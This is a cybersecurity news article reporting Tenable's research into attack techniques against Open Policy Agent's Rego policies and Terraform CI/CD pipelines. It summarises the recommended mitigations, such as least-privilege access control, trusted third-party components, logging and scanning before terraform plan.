SecurityBrief Australia - Technology news for CISOs & cybersecurity decision-makers
Story image

Tenable discovers vulnerabilities in IaC & PaC platforms

Thu, 21st Nov 2024

Tenable's Cloud Security Research team has identified new attack techniques in Domain-Specific Languages of widely-used policy-as-code and infrastructure-as-code platforms, potentially leading to security breaches and data exfiltration.

The research highlights vulnerabilities in systems that utilise Domain-Specific Languages (DSLs), which are often perceived as secure due to their limited capabilities compared to general programming languages. However, assumptions of default security in these frameworks can render systems susceptible to exploitation.

The discovery comes after a known SMB force-authentication vulnerability was found in Open Policy Agent (OPA). These revelations underscore the need to re-evaluate security measures for policy-as-code (PaC) and infrastructure-as-code (IaC) deployments.

In the context of OPA, the Tenable team discovered how attackers could exploit the policy supply chain by inserting harmful Rego policies during policy evaluations, facilitating actions such as credential exfiltration or data leaks. OPA, a popular policy engine, is employed across diverse applications, including microservice authorization and infrastructure policies, with policies written in the Rego DSL.

Furthermore, the research delved into Terraform, another prominent IaC tool renowned for its platform-agnostic and declarative nature. Terraform configurations use HashiCorp Configuration Language (HCL), another DSL. Tenable found that unreviewed code execution could occur when Terraform is configured to run on a pull request trigger in CI/CD pipelines, posing a risk through potential exploitation by insider threats or external actors.

In response to these findings, Tenable Research has laid out comprehensive mitigation strategies. These include implementing granular role-based access control (RBAC) to adhere to the principle of least privilege, which involves separating user roles and securing cloud roles. RBAC should be applied to both local users operating the IaC or PaC framework and those accessing it via APIs.

Another key recommendation is to only utilise third-party components from credible sources. This pertains to Terraform's modules and providers, as well as OPA policies, ensuring these components maintain integrity before execution to prevent unauthorised modifications.

Tenable also advises setting up application-level and cloud-level logging for ongoing monitoring and analysis, alongside limiting the network and data access for applications and their underlying infrastructure.

Additionally, the advice extends to ensuring no automatic execution of unverified code within CI/CD pipelines. This step, referred to as "Scan before you plan", involves placing security scanners before the terraform plan stage to foreclose the deployment of potentially harmful code.

These insights and recommendations are available for further exploration and understanding on Tenable's blog, providing a detailed analysis of the attack techniques and corresponding mitigation strategies.

Follow us on:
Follow us on LinkedIn Follow us on X
Share on:
Share on LinkedIn Share on X